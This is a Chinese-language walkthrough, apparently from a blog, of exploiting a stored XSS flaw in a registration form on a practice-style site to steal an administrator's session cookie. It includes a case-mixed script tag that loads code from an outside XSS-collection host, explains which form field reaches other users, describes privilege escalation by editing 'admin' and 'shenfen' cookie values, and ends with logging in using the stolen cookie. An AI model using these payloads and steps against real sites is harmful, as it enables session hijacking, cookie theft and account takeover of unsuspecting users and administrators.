简单来说就是用cookie来登录。
证明存在XSS,一般打弹窗()或者直接窃取cookie(标签触发,不用点击)
第二种方法就是通过伪协议来证明XSS,http:// ftp://(伪协议触发,需要点击,有点类似于链接,需要点击才会跳转,所以才会触发)
第三种事件触发:满足某种条件自动触发。
注册一个账号,昵称这里是存储型XSS
http://59.63.200.79:8002/d/index.asp
因为是一个存储型XSS,所以每次登陆的时候,都会触发这个XSS
这里插一个题外话,我们用普通用户变成管理员用户,
这里用插件把admin的值改为1,再把shenfen的值改为1,就从普通用户变成了管理员身份。
用管理员身份进入后台。
会看到弹窗,说明其他用户也会触发这个储存型的xss
那就表明了,可以窃取admin的cookie
好的,回到XSS,注册一个xss平台的账号,然后除了选这2个,其他都是默认。
然后选择这个短的xss代码。
如果最短的那个代码不行,那就用一般格式的代码
把这个代码复制进去。点击注册。
(如果只在用户昵称,这一栏插入,那么xss平台智能获取自己的cookie,别人来访问的话,不会获取的别人的cookie,如果想获取别人的cookie的话,建议全部插入,因为这样不管是不是别人,都可以窃取自己或者别人的cookie)
注册成功后,我们去查看xss平台获取的cookie
获得的cookie。
管理员登录查看后台,触发XSS,
但是这里楼主的XSS触发失败,
那么我们就重新打下XSS,用正常一点的xss语句,不用之前那个短的xss语句。
<sCRiPt sRC=//xs.sb/mWBX></sCrIpT>
多插一行。点击注册,成功插入储存型XSS
经过楼主的反复试验,如果想获取别人的cookie的话,必须是“真实姓名”这一栏才有效果,其他的只是抓取自己的cookie
然后到xss平台看刚刚偷到的cookie
储存型xss插入数据库后,管理员账户一登录查看后台,xss平台就会获取到管理员的cookie。
打开xss平台可以看到这里多了一条,我们打开一看就是管理员的cookie
之后我们把cookie登录就行。
1293
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
